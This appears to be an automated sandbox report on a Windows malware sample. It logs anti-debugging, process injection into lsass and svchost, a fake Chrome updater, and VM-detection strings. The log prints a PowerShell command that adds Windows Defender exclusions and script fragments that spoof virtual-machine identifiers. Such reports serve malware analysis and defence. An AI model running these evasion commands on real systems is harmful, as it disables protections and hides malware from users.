Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000F.00000002.3019665263.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1949907163.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000011.00000000.1818929292.000001D559386000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000011.00000003.1837092807.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000011.00000003.1844293495.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000008.00000000.1747335581.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2981325405.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2960919454.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1753411970.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1787229019.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2959653113.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1789041841.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2959031284.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1799203992.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2971480214.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000009.00000000.1753452137.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000011.00000002.2984001454.000001D558F62000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2963751898.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000011.00000000.1816191216.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000009.00000003.1981446312.000002A660660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000002.2956193714.000002295CE00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000011.00000000.1818211836.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00000225DC647E70

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB314E4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC64B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6A7E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6AB50C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AE7E70
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AEB50C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A661307E70
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A66130B50C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE297E70
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE29B50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537AB50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537A7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D47E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D567E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D56B50C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E67E70
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E6B50C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3B7E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3BB50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD47E70
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D55907B50C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D559077E70
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EAB50C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EA7E70
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3EB50C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3E7E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD73197E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD7319B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E89B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E897E70
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8FB50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8F7E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B37E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B3B50C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAE260000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 179537D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25306E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADECD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D5590A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9ED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD731C0000 protect: page execute and read and write
